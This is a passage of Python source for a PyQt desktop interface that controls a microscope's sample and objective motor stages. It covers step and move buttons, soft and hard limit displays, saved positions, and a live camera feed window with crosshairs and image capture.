self.xSSp.setStyleSheet(label_style_grey)\n self.xSHn.setStyleSheet(label_style_grey)\n self.xSHp.setStyleSheet(label_style_grey)\n self.xIdleS.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n layout.addWidget(self.xSN, 2, 1, 1, 1)\n layout.addWidget(self.xSP, 2, 2, 1, 1)\n layout.addWidget(self.xSStep, 2, 3, 1, 1)\n layout.addWidget(self.xSAbsPos, 2, 4, 1, 1)\n layout.addWidget(self.xSMove, 2, 5, 1, 1)\n layout.addWidget(self.xSCn, 2, 6, 1, 1)\n layout.addWidget(self.xSStop, 2, 7, 1, 1)\n layout.addWidget(self.xSCp, 2, 8, 1, 1)\n layout.addWidget(self.xSSn, 2, 9, 1, 1)\n layout.addWidget(self.xSSp, 2, 10, 1, 1)\n layout.addWidget(self.xSHn, 2, 11, 1, 1)\n layout.addWidget(self.xSHp, 2, 12, 1, 1)\n layout.addWidget(self.xStepS, 2, 13, 1, 1)\n layout.addWidget(self.xIdleS, 2, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Y Sample Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.ySN = QPushButton(\"Up\")\n self.ySP = QPushButton(\"Down\")\n self.ySStep = QLineEdit(\"0\")\n self.ySAbsPos = QLineEdit(\"0\")\n self.ySMove = QPushButton(\"MOVE\")\n self.ySCn = QPushButton(\"Up\")\n self.ySStop = QPushButton(\"STOP\")\n self.ySCp = QPushButton(\"Down\")\n self.ySSn = QLabel(\"Up\")\n self.ySSp = QLabel(\"Down\")\n self.ySHn = QLabel(\"Up\")\n self.ySHp = QLabel(\"Down\")\n self.yIdleS = QLabel(\"IDLE\")\n self.yStepS = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.yIdleS.setAlignment(Qt.AlignCenter)\n self.yStepS.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.ySN.setStyleSheet(button_style_grey)\n self.ySP.setStyleSheet(button_style_grey)\n self.ySMove.setStyleSheet(button_style_grey)\n self.ySCn.setStyleSheet(button_style_grey)\n self.ySStop.setStyleSheet(button_style_red)\n self.ySCp.setStyleSheet(button_style_grey)\n self.ySSn.setStyleSheet(label_style_grey)\n self.ySSp.setStyleSheet(label_style_grey)\n self.ySHn.setStyleSheet(label_style_grey)\n self.ySHp.setStyleSheet(label_style_grey)\n self.yIdleS.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n layout.addWidget(self.ySN, 3, 1, 1, 1)\n layout.addWidget(self.ySP, 3, 2, 1, 1)\n layout.addWidget(self.ySStep, 3, 3, 1, 1)\n layout.addWidget(self.ySAbsPos, 3, 4, 1, 1)\n layout.addWidget(self.ySMove, 3, 5, 1, 1)\n layout.addWidget(self.ySCn, 3, 6, 1, 1)\n layout.addWidget(self.ySStop, 3, 7, 1, 1)\n layout.addWidget(self.ySCp, 3, 8, 1, 1)\n layout.addWidget(self.ySSn, 3, 9, 1, 1)\n layout.addWidget(self.ySSp, 3, 10, 1, 1)\n layout.addWidget(self.ySHn, 3, 11, 1, 1)\n layout.addWidget(self.ySHp, 3, 12, 1, 1)\n layout.addWidget(self.yStepS, 3, 13, 1, 1)\n layout.addWidget(self.yIdleS, 3, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Z Sample Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.zSN = QPushButton(\"Upstream\")\n self.zSP = QPushButton(\"Downstream\")\n self.zSStep = QLineEdit(\"0\")\n self.zSAbsPos = QLineEdit(\"0\")\n self.zSMove = QPushButton(\"MOVE\")\n self.zSCn = QPushButton(\"Upstream\")\n self.zSStop = QPushButton(\"STOP\")\n self.zSCp = QPushButton(\"Downstream\")\n self.zSSn = QLabel(\"Upstream \")\n self.zSSp = QLabel(\"Downstream\")\n self.zSHn = QLabel(\"Upstream \")\n self.zSHp = QLabel(\"Downstream\")\n self.zIdleS = QLabel(\"IDLE\")\n self.zStepS = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.zIdleS.setAlignment(Qt.AlignCenter)\n self.zStepS.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.zSN.setStyleSheet(button_style_grey)\n self.zSP.setStyleSheet(button_style_grey)\n self.zSMove.setStyleSheet(button_style_grey)\n self.zSCn.setStyleSheet(button_style_grey)\n self.zSStop.setStyleSheet(button_style_red)\n self.zSCp.setStyleSheet(button_style_grey)\n self.zSSn.setStyleSheet(label_style_grey)\n self.zSSp.setStyleSheet(label_style_grey)\n self.zSHn.setStyleSheet(label_style_grey)\n self.zSHp.setStyleSheet(label_style_grey)\n self.zIdleS.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n layout.addWidget(self.zSN, 4, 1, 1, 1)\n layout.addWidget(self.zSP, 4, 2, 1, 1)\n layout.addWidget(self.zSStep, 4, 3, 1, 1)\n layout.addWidget(self.zSAbsPos, 4, 4, 1, 1)\n layout.addWidget(self.zSMove, 4, 5, 1, 1)\n layout.addWidget(self.zSCn, 4, 6, 1, 1)\n layout.addWidget(self.zSStop, 4, 7, 1, 1)\n layout.addWidget(self.zSCp, 4, 8, 1, 1)\n layout.addWidget(self.zSSn, 4, 9, 1, 1)\n layout.addWidget(self.zSSp, 4, 10, 1, 1)\n layout.addWidget(self.zSHn, 4, 11, 1, 1)\n layout.addWidget(self.zSHp, 4, 12, 1, 1)\n layout.addWidget(self.zStepS, 4, 13, 1, 1)\n layout.addWidget(self.zIdleS, 4, 14, 1, 1)\n\n # Set window layout.\n window.setLayout(layout)\n return window\n\n def objective_window(self) -> QWidget:\n \"\"\"Return the objective window.\n\n This method returns the controls and motor status indicators for the\n objective stage.\n\n Returns\n -------\n QWidget\n Window representing the objective interactive widgets.\n \"\"\"\n\n window = QWidget()\n layout = QGridLayout()\n\n objectiveLab = QLabel(\"Objective Stage\")\n objectiveLab.setFont(QFont(\"Times\", 9))\n layout.addWidget(objectiveLab, 0, 0, 1, 13)\n\n # Define widget style sheets.\n button_style_grey = \"background-color: lightgrey\"\n button_style_red = \"background-color: red\"\n label_style_grey = \"background-color: lightgrey; border: 1px solid black;\"\n\n # Set column labels.\n layout.addWidget(QLabel(\"Axis\"), 1, 0, 1, 1)\n layout.addWidget(QLabel(\"Increment Position\"), 1, 1, 1, 2)\n layout.addWidget(QLabel(\"Step Size\"), 1, 3, 1, 1)\n layout.addWidget(QLabel(\"Absolute Position\"), 1, 4, 1, 1)\n layout.addWidget(QLabel(\"Continual Motion\"), 1, 6, 1, 3)\n layout.addWidget(QLabel(\"Soft Limits\"), 1, 9, 1, 2)\n layout.addWidget(QLabel(\"Hard Limits\"), 1, 11, 1, 2)\n layout.addWidget(QLabel(\"Current Position\"), 1, 13, 1, 1)\n layout.addWidget(QLabel(\"Motor Status\"), 1, 14, 1, 1)\n\n # ----------------------------------------------------------------------\n # X Objective Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.xON = QPushButton(\"In\")\n self.xOP = QPushButton(\"Out\")\n self.xOStep = QLineEdit(\"0\")\n self.xOAbsPos = QLineEdit(\"0\")\n self.xOMove = QPushButton(\"MOVE\")\n self.xOCn = QPushButton(\"In\")\n self.xOStop = QPushButton(\"STOP\")\n self.xOCp = QPushButton(\"Out\")\n self.xOSn = QLabel(\"In\")\n self.xOSp = QLabel(\"Out\")\n self.xOHn = QLabel(\"In\")\n self.xOHp = QLabel(\"Out\")\n self.xIdleO = QLabel(\"IDLE\")\n self.xStepO = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.xIdleO.setAlignment(Qt.AlignCenter)\n self.xStepO.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.xON.setStyleSheet(button_style_grey)\n self.xOP.setStyleSheet(button_style_grey)\n self.xOMove.setStyleSheet(button_style_grey)\n self.xOCn.setStyleSheet(button_style_grey)\n self.xOStop.setStyleSheet(button_style_red)\n self.xOCp.setStyleSheet(button_style_grey)\n self.xOSn.setStyleSheet(label_style_grey)\n self.xOSp.setStyleSheet(label_style_grey)\n self.xOHn.setStyleSheet(label_style_grey)\n self.xOHp.setStyleSheet(label_style_grey)\n self.xIdleO.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n layout.addWidget(self.xON, 2, 1, 1, 1)\n layout.addWidget(self.xOP, 2, 2, 1, 1)\n layout.addWidget(self.xOStep, 2, 3, 1, 1)\n layout.addWidget(self.xOAbsPos, 2, 4, 1, 1)\n layout.addWidget(self.xOMove, 2, 5, 1, 1)\n layout.addWidget(self.xOCn, 2, 6, 1, 1)\n layout.addWidget(self.xOStop, 2, 7, 1, 1)\n layout.addWidget(self.xOCp, 2, 8, 1, 1)\n layout.addWidget(self.xOSn, 2, 9, 1, 1)\n layout.addWidget(self.xOSp, 2, 10, 1, 1)\n layout.addWidget(self.xOHn, 2, 11, 1, 1)\n layout.addWidget(self.xOHp, 2, 12, 1, 1)\n layout.addWidget(self.xStepO, 2, 13, 1, 1)\n layout.addWidget(self.xIdleO, 2, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Y Objectivs Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.yON = QPushButton(\"Up\")\n self.yOP = QPushButton(\"Down\")\n self.yOStep = QLineEdit(\"0\")\n self.yOAbsPos = QLineEdit(\"0\")\n self.yOMove = QPushButton(\"MOVE\")\n self.yOCn = QPushButton(\"Up\")\n self.yOStop = QPushButton(\"STOP\")\n self.yOCp = QPushButton(\"Down\")\n self.yOSn = QLabel(\"Up\")\n self.yOSp = QLabel(\"Down\")\n self.yOHn = QLabel(\"Up\")\n self.yOHp = QLabel(\"Down\")\n self.yIdleO = QLabel(\"IDLE\")\n self.yStepO = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.yIdleO.setAlignment(Qt.AlignCenter)\n self.yStepO.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.yON.setStyleSheet(button_style_grey)\n self.yOP.setStyleSheet(button_style_grey)\n self.yOMove.setStyleSheet(button_style_grey)\n self.yOCn.setStyleSheet(button_style_grey)\n self.yOStop.setStyleSheet(button_style_red)\n self.yOCp.setStyleSheet(button_style_grey)\n self.yOSn.setStyleSheet(label_style_grey)\n self.yOSp.setStyleSheet(label_style_grey)\n self.yOHn.setStyleSheet(label_style_grey)\n self.yOHp.setStyleSheet(label_style_grey)\n self.yIdleO.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n layout.addWidget(self.yON, 3, 1, 1, 1)\n layout.addWidget(self.yOP, 3, 2, 1, 1)\n layout.addWidget(self.yOStep, 3, 3, 1, 1)\n layout.addWidget(self.yOAbsPos, 3, 4, 1, 1)\n layout.addWidget(self.yOMove, 3, 5, 1, 1)\n layout.addWidget(self.yOCn, 3, 6, 1, 1)\n layout.addWidget(self.yOStop, 3, 7, 1, 1)\n layout.addWidget(self.yOCp, 3, 8, 1, 1)\n layout.addWidget(self.yOSn, 3, 9, 1, 1)\n layout.addWidget(self.yOSp, 3, 10, 1, 1)\n layout.addWidget(self.yOHn, 3, 11, 1, 1)\n layout.addWidget(self.yOHp, 3, 12, 1, 1)\n layout.addWidget(self.yStepO, 3, 13, 1, 1)\n layout.addWidget(self.yIdleO, 3, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # Z Objective Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.zON = QPushButton(\"Upstream\")\n self.zOP = QPushButton(\"Downstream\")\n self.zOStep = QLineEdit(\"0\")\n self.zOAbsPos = QLineEdit(\"0\")\n self.zOMove = QPushButton(\"MOVE\")\n self.zOCn = QPushButton(\"Upstream\")\n self.zOStop = QPushButton(\"STOP\")\n self.zOCp = QPushButton(\"Downstream\")\n self.zOSn = QLabel(\"Upstream \")\n self.zOSp = QLabel(\"Downstream\")\n self.zOHn = QLabel(\"Upstream \")\n self.zOHp = QLabel(\"Downstream\")\n self.zIdleO = QLabel(\"IDLE\")\n self.zStepO = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.zIdleO.setAlignment(Qt.AlignCenter)\n self.zStepO.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.zON.setStyleSheet(button_style_grey)\n self.zOP.setStyleSheet(button_style_grey)\n self.zOMove.setStyleSheet(button_style_grey)\n self.zOCn.setStyleSheet(button_style_grey)\n self.zOStop.setStyleSheet(button_style_red)\n self.zOCp.setStyleSheet(button_style_grey)\n self.zOSn.setStyleSheet(label_style_grey)\n self.zOSp.setStyleSheet(label_style_grey)\n self.zOHn.setStyleSheet(label_style_grey)\n self.zOHp.setStyleSheet(label_style_grey)\n self.zIdleO.setStyleSheet(label_style_grey)\n\n # Organize widgets on layout.\n layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n layout.addWidget(self.zON, 4, 1, 1, 1)\n layout.addWidget(self.zOP, 4, 2, 1, 1)\n layout.addWidget(self.zOStep, 4, 3, 1, 1)\n layout.addWidget(self.zOAbsPos, 4, 4, 1, 1)\n layout.addWidget(self.zOMove, 4, 5, 1, 1)\n layout.addWidget(self.zOCn, 4, 6, 1, 1)\n layout.addWidget(self.zOStop, 4, 7, 1, 1)\n layout.addWidget(self.zOCp, 4, 8, 1, 1)\n layout.addWidget(self.zOSn, 4, 9, 1, 1)\n layout.addWidget(self.zOSp, 4, 10, 1, 1)\n layout.addWidget(self.zOHn, 4, 11, 1, 1)\n layout.addWidget(self.zOHp, 4, 12, 1, 1)\n layout.addWidget(self.zStepO, 4, 13, 1, 1)\n layout.addWidget(self.zIdleO, 4, 14, 1, 1)\n\n # Set window layout.\n window.setLayout(layout)\n return window\n\n def base_window(self) -> QTextBrowser:\n \"\"\"Return the base window.\n\n This method returns the user interface's base window containing the\n program status window, position save controls, configuration file\n controls, and current position unit controls.\n\n Returns\n -------\n QWidget\n Window representing the objective interactive widgets.\n \"\"\"\n\n # Initialize the text browser window.\n self.textWindow = QTextBrowser()\n self.textWindow.setAcceptRichText(True)\n self.textWindow.setOpenExternalLinks(True)\n self.textWindow.setVerticalScrollBar(QScrollBar())\n\n # Save and load position functionality.\n self.savePos = QPushButton(\"Save Position\")\n self.loadPos = QPushButton(\"Load Position\")\n self.deletePos = QPushButton(\"Delete Position\")\n self.clearPos = QPushButton(\"Clear All Positions\")\n self.posSelect = QComboBox()\n self.posLabel = QLineEdit(\"Position Label\")\n\n # Add items to the saved positions drop down menu.\n self.posSelect.addItem(\"--None--\")\n for key in self.savedPos.keys():\n self.posSelect.addItem(key)\n\n # Set button style sheets.\n self.savePos.setStyleSheet(\"background-color: lightgrey\")\n self.loadPos.setStyleSheet(\"background-color: lightgrey\")\n self.deletePos.setStyleSheet(\"background-color: lightgrey\")\n self.clearPos.setStyleSheet(\"background-color: lightgrey\")\n\n # Set the save and load layout.\n self.posWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(QLabel(\"Save and Load Position\"), 0, 0, 1, 5)\n layout.addWidget(self.posSelect, 1, 0, 1, 2)\n layout.addWidget(self.loadPos, 2, 0, 1, 1)\n layout.addWidget(self.deletePos, 2, 1, 1, 1)\n layout.addWidget(self.posLabel, 1, 2, 1, 1)\n layout.addWidget(self.savePos, 1, 3, 1, 1)\n layout.addWidget(self.clearPos, 2, 2, 1, 2)\n self.posWindow.setLayout(layout)\n\n # Progran-configuration functionality.\n self.configWindow = QWidget()\n self.loadConfig = QPushButton(\"Load Config\")\n self.saveConfig = QPushButton(\"Save Config\")\n self.loadConfig.setStyleSheet(\"background-color: lightgrey\")\n self.saveConfig.setStyleSheet(\"background-color: lightgrey\")\n\n # Set the program configuration layout.\n self.configWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(QLabel(\"Program Configuration\"), 0, 0, 1, 2)\n layout.addWidget(self.loadConfig, 1, 0, 1, 2)\n layout.addWidget(self.saveConfig, 2, 0, 1, 2)\n self.configWindow.setLayout(layout)\n\n # Unit conversion functionality.\n self.positionUnits = QPushButton(\"Microns\")\n self.positionUnits.setStyleSheet(\"background-color: lightgrey\")\n self.positionUnits.setCheckable(True)\n\n # Set units window layout.\n self.unitsWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(QLabel(\"Current Position Units\"), 0, 0, 1, 1)\n layout.addWidget(self.positionUnits, 1, 0, 2, 1)\n self.unitsWindow.setLayout(layout)\n\n # Create base window.\n self.baseWindow = QWidget()\n layout = QGridLayout()\n layout.addWidget(self.textWindow, 0, 0, 3, 5)\n layout.addWidget(self.posWindow, 0, 5, 3, 5)\n layout.addWidget(self.configWindow, 0, 10, 3, 2)\n layout.addWidget(self.unitsWindow, 0, 12, 3, 2)\n self.baseWindow.setLayout(layout)\n\n return self.baseWindow\n\n\nclass CameraWindow(QMainWindow):\n \"\"\"Generate detachable camera window.\n\n Attributes\n ----------\n cameraWindow : QWidget\n QWidget window containing camera feed and interface.\n img : pg.ImageItem\n Live feed image from Blackfly camera.\n image : nd.array\n Current image displayed in an array representation.\n WCB : QPushButton\n Image capture push button.\n SHC : QPushButton\n Show Cross Hairs toggle push button.\n\n Methods\n -------\n camera_window()\n Create live feed window.\n save_image()\n Live stream image capture.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize camera window.\n \n This method initializes the camera window by configuring the main\n winodw and connecting controls to control sequences.\n \"\"\"\n\n super().__init__()\n\n # Organize window.\n dock = QDockWidget(\"Live Stream\", self)\n dock.setAllowedAreas(Qt.AllDockWidgetAreas)\n dock.setFeatures(dock.DockWidgetFloatable)\n dock.setWidget(self.camera_window())\n self.addDockWidget(Qt.TopDockWidgetArea, dock)\n\n # Save image functionality.\n self.WCB.clicked.connect(self.save_image)\n\n def camera_window(self) -> QWidget:\n \"\"\"Create live feed window.\n\n Returns\n -------\n QWidget\n Window representing the live feed and interactive widgets.\n \n Notes\n -----\n This method creates the live feed by repeatedly calling for an image\n from the camera. It takes the received Numpy array and displays it on\n a matplotlib plot. This is a very poor way of displaying a video and\n should be looked into improving as it may significantly reduce the\n latency of the program.\n \"\"\"\n\n def updateData() -> None:\n \"\"\"Update live feed display.\n\n This method updates the live feed display by calling for a new\n image and plotting the returned Numpy array on a matplotlib plot.\n\n Notes\n -----\n The red cross hair is added by changing the central five rows and\n columns of pixels in the image to red (RGB=[225, 0, 0]).\n \"\"\"\n\n # Get new image.\n self.image = np.copy(np.rot90(get_image()))\n height = self.image.shape[0]\n width = self.image.shape[1]\n\n # Generate cross hairs\n if self.SCH.isChecked():\n length = int(0.1 * min(height, width))\n xLine = np.full((5, 2 * length, 3), [225, 0, 0])\n yLine = np.full((length * 2, 5, 3), [225, 0, 0])\n self.image[height // 2 - 2:height // 2 + 3,\n width // 2 - length:width // 2 + length] = xLine\n self.image[height // 2 - length:height // 2 +\n length:, width // 2 - 2:width // 2 + 3] = yLine\n\n # Update image.\n self.img.setImage(np.fliplr(np.rot90(self.image, 2)))\n QTimer.singleShot(75, updateData)\n\n # Initialize timer.\n now = ptime.time()\n fps2 = 1.0 / (now - self.updateTime)\n self.updateTime = now\n self.fps = self.fps * 0.9 + fps2 * 0.1\n\n # Configure camera window.\n self.cameraWindow = QWidget()\n pg.setConfigOptions(antialias=True)\n win = pg.GraphicsLayoutWidget()\n self.img = pg.ImageItem(border='w')\n\n # Create viewing box.\n view = win.addViewBox()\n view.setAspectLocked(True)\n view.addItem(self.img)\n view.setRange(QRectF(300, 0, 700, 1000))\n\n self.updateTime = ptime.time()\n self.fps = 0\n\n layout = QGridLayout()\n\n # Create, modify, and place image buttons.\n self.WCB = QPushButton(\"Image Capture\")\n self.SCH = QPushButton(\"Show Cross Hairs\")\n self.WCB.setStyleSheet(\"background-color: lightgrey\")\n self.SCH.setStyleSheet(\"background-color: lightgrey\")\n self.SCH.setCheckable(True)\n layout.addWidget(win, 0, 0, 1, 2)\n layout.addWidget(self.WCB, 1, 0, 1, 1)\n layout.addWidget(self.SCH, 1, 1, 1, 1)\n\n self.cameraWindow.setLayout(layout)\n\n updateData()\n\n return self.cameraWindow\n\n def save_image(self) -> None:\n \"\"\"Live stream image capture.\n\n This method saves a capture of the current live stream to the chosen\n directory.\n\n Notes\n -----\n The image will be saved as the Numpy array shown on the matplotlib\n plot. Thus, if the cross hairs button is turned on, the cross hairs\n will also be saved in the image.\n \"\"\"\n\n params = {\"parent\": self,\n \"caption\": \"Save File\",\n \"directory\": \"../figures\",\n \"filter\": \"Image files (*.jpg *.jpeg)\"}\n path, _ = QFileDialog.getSaveFileName(**params)\n\n plt.figure()\n plt.imshow(np.rot90(self.image, 3))\n plt.axis(\"off\")\n plt.savefig(path, dpi=500, bbox_inches=\"tight\")\n\n\nclass MyTableWidget(QWidget):\n \"\"\"GUI table window.\n\n The MytableWidget class creates the table widget which extends the\n functionality of the main gui window.\n\n Parameters\n ----------\n parent : Any\n Defines parent object of the MyTableWidget object.\n\n Attributes\n ----------\n tabs : QTabWidget\n Points to the object defining the table window.\n tab2 : QWidget\n Mode tab of the table window.\n tab3 : QWidget\n Hard Limits tab of the table window.\n tab4 : QWidget\n Soft Limits tab of the table window.\n tab5 : QWidget\n Zero tab of the table window.\n tab6 : QWidget\n Backlash tab of the table window.\n RDM1 : QRadioButton\n Transmission mode radio button.\n RDM2 : QRadioButton\n Reflection mode radio button.\n RDM3 : QRadioButton\n Visible Image mode radio button.\n RDM4 : QRadioButton\n Beamsplitter mode radio button.\n group : QButtonGroup\n Mode select button group.\n TMTM : QLineEdit\n Transmission mode position line edit.\n TMRM : QLineEdit\n Reflection mode position line edit.\n TMVM : QLineEdit\n Visual image mode position line edit.\n TMBM : QLineEdit\n Beamsplitter mode position line edit.\n TMTMbutton : QPushButton\n Transmission \"Set Position\" button.\n TMRMbutton : QPushButton\n Reflection \"Set Position\" button.\n TMVMbutton : QPushButton\n Visual image \"Set Position\" button.\n TMBMbutton : QPushButton\n Beamsplitter \"Set Position\" button.\n enableDisable : QPushButton\n Enable or Disable the THORLABS/mode motor.\n home : QPushButton\n Home THORLABS/mode motor.\n xSMM, ySMM, zSMM : QLabel\n Minimum and maximum label for the sample's x, y, and z dimensions.\n xOMM, yOMM, zOMM : QLabel\n Minimum and maximum label for the objective's x, y, and z dimensions.\n xSMin, xSMax, ySMin : QLineEdit\n Soft limit minimum for the sample's x, y, and z dimensions.\n ySMax, zSMin, zSMax : QLineEdit\n Soft limit maximum for the sample's x, y, and z dimensions.\n xOMin, yOMin, zOMin : QLineEdit\n Soft limit minimum for the objective's x, y, and z dimensions.\n xOMax, yOMax, zOMax : QLineEdit\n Soft limit maximum for the objective's x, y, and z dimensions.\n SSL : QPushButton\n Set soft limits button.\n SMSL : QPushButton\n Set minimal soft limits button.\n SESL : QPushButton\n Set maximal soft limits button.\n xSOffset, ySOffset, zSOffset : QLabel\n Current offset label for the sample's x, y, and z dimensions.\n xSZero, ySZero, zSZero : QPushButton\n Button to zero the sample's x, y, and z dimensions.\n xSActual, ySActual, zSActual : QPushButton\n B, dimensions.\n xOOffset, yOOffset, zOOffset : QLabel\n Current offset label for the objective's x, y, and z dimensions.\n xOZero, yOZero, zOZero : QPushButton\n Button to zero the objective's x, y, and z dimensions.\n xOActual, yOActual, zOActual : QPushButton\n Button to display actual values for the objective's x, y, and z\n dimensions.\n zeroAll : QPushButton\n Button to zero all stages.\n allActual : QPushButton\n Button to change all displays to actual values.\n xSB, ySB, zSB : QLineEdit\n Backlash input for the sample's x, y, and z dimensions.\n xOB, yOB, zOB : QLineEdit\n Backlash input for the objective's x, y, and z dimensions.\n SBL : QPushButton\n Update all backlash values button.\n \"\"\"\n\n def __init__(self, parent: Any) -> None:\n \"\"\"Initialize table.\n \n This method creates the main user interfaces tab window by setting the\n tabs and adding then to the main tab window. Then for each tab, the\n program creates the neccessary widgets and organizes them on the tabs\n layout.\n \"\"\"\n\n self.parent = parent\n\n super(QWidget, self).__init__(parent)\n self.layout = QVBoxLayout(self)\n\n # Define tab windows.\n self.tabs = QTabWidget()\n self.tab2 = QWidget()\n self.tab3 = QWidget()\n self.tab4 = QWidget()\n self.tab5 = QWidget()\n self.tab6 = QWidget()\n\n self.tabs.resize(3000, 1000)\n\n # Add tabs to window layout.\n self.tabs.addTab(self.tab2, \"Mode\")\n self.tabs.addTab(self.tab3, \"Hard Limits\")\n self.tabs.addTab(self.tab4, \"Soft Limits\")\n self.tabs.addTab(self.tab5, \"Zero\")\n self.tabs.addTab(self.tab6, \"Backlash\")\n\n # Define helpr function to get macro values as strings.\n def macro_str(label: str) -> str:\n return str(float(self.parent.macros[label]))\n\n # ---------------------------------------------------------------------\n # Tab 2\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab2.layout = QGridLayout()\n\n self.tab2.layout.addWidget(QLabel(\"Mode Selection\"), 0, 0, 1, 4)\n\n # Define mode select buttons.\n self.RDM1 = QRadioButton(\"Transmission\")\n self.RDM2 = QRadioButton(\"Reflection\")\n self.RDM3 = QRadioButton(\"Visible Image\")\n self.RDM4 = QRadioButton(\"Beamsplitter\")\n\n # Group buttons together.\n self.group = QButtonGroup()\n self.group.addButton(self.RDM1)\n self.group.addButton(self.RDM2)\n self.group.addButton(self.RDM3)\n self.group.addButton(self.RDM4)\n\n # Organize widgets on tab layout.\n self.tab2.layout.addWidget(self.RDM1, 1, 0, 1, 1)\n self.tab2.layout.addWidget(self.RDM2, 2, 0, 1, 1)\n self.tab2.layout.addWidget(self.RDM3, 3, 0, 1, 1)\n self.tab2.layout.addWidget(self.RDM4, 4, 0, 1, 1)\n\n # Set position customization widgets\n self.TMTM = QLineEdit(macro_str(\"TRANSMISSION_POSITION\"))\n self.TMRM = QLineEdit(macro_str(\"REFLECTION_POSITION\"))\n self.TMVM = QLineEdit(macro_str(\"VISIBLE_IMAGE_POSITION\"))\n self.TMBM = QLineEdit(macro_str(\"BEAMSPLITTER_POSITION\"))\n\n # Add position widgets to the tab layout.\n self.tab2.layout.addWidget(self.TMTM, 1, 1, 1, 1)\n self.tab2.layout.addWidget(self.TMRM, 2, 1, 1, 1)\n self.tab2.layout.addWidget(self.TMVM, 3, 1, 1, 1)\n self.tab2.layout.addWidget(self.TMBM, 4, 1, 1, 1)\n\n # Define set position buttons.\n self.TMTMbutton = QPushButton(\"Set Position\")\n self.TMRMbutton = QPushButton(\"Set Position\")\n self.TMVMbutton = QPushButton(\"Set Position\")\n self.TMBMbutton = QPushButton(\"Set Position\")\n\n # Add set position buttons to the tab layout.\n self.tab2.layout.addWidget(self.TMTMbutton, 1, 2, 1, 1)\n self.tab2.layout.addWidget(self.TMRMbutton, 2, 2, 1, 1)\n self.tab2.layout.addWidget(self.TMVMbutton, 3, 2, 1, 1)\n self.tab2.layout.addWidget(self.TMBMbutton, 4, 2, 1, 1)\n\n self.tab2.layout.addWidget(QLabel(\"Motor Control\"), 5, 0, 1, 4)\n longLabel = \"Enable or disable the THORLABS motor and move to home position.\"\n self.tab2.layout.addWidget(QLabel(longLabel), 6, 0, 1, 4)\n\n # THORLABS/mode motor controls.\n self.enableDisable = QPushButton(\"Disable\")\n self.home = QPushButton(\"Home Motor\")\n self.tab2.layout.addWidget(self.enableDisable, 7, 0, 1, 1)\n self.tab2.layout.addWidget(self.home, 7, 1, 1, 2)\n\n # Set tab layout.\n self.tab2.setLayout(self.tab2.layout)\n\n # ---------------------------------------------------------------------\n # Tab 3\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab3.layout = QGridLayout()\n\n # Define interactive sample widgets.\n xHardMin = self.parent.macros[\"XSMIN_HARD_LIMIT\"]\n xHardMax = self.parent.macros[\"XSMAX_HARD_LIMIT\"]\n yHardMin = self.parent.macros[\"YSMIN_HARD_LIMIT\"]\n yHardMax = self.parent.macros[\"YSMAX_HARD_LIMIT\"]\n zHardMin = self.parent.macros[\"ZSMIN_HARD_LIMIT\"]\n zHardMax = self.parent.macros[\"ZSMAX_HARD_LIMIT\"]\n self.xSMM = QLabel(f\"{xHardMin} to {xHardMax}\")\n self.ySMM = QLabel(f\"{yHardMin} to {yHardMax}\")\n self.zSMM = QLabel(f\"{zHardMin} to {zHardMax}\")\n\n # Organize sample widgets in the tab layout.\n self.tab3.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 2)\n self.tab3.layout.addWidget(QLabel(\"In, Out\"), 1, 1, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Up, Down\"), 3, 1, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Vertical:\"), 4, 0, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Upstream, Downstream\"), 5, 1, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Focus:\"), 6, 0, 1, 1)\n self.tab3.layout.addWidget(self.xSMM, 2, 1, 1, 1)\n self.tab3.layout.addWidget(self.ySMM, 4, 1, 1, 1)\n self.tab3.layout.addWidget(self.zSMM, 6, 1, 1, 1)\n\n # Define interactive objective widgets.\n xHardMin = self.parent.macros[\"XOMIN_HARD_LIMIT\"]\n xHardMax = self.parent.macros[\"XOMAX_HARD_LIMIT\"]\n yHardMin = self.parent.macros[\"YOMIN_HARD_LIMIT\"]\n yHardMax = self.parent.macros[\"YOMAX_HARD_LIMIT\"]\n zHardMin = self.parent.macros[\"ZOMIN_HARD_LIMIT\"]\n zHardMax = self.parent.macros[\"ZOMAX_HARD_LIMIT\"]\n self.xOMM = QLabel(f\"{xHardMin} 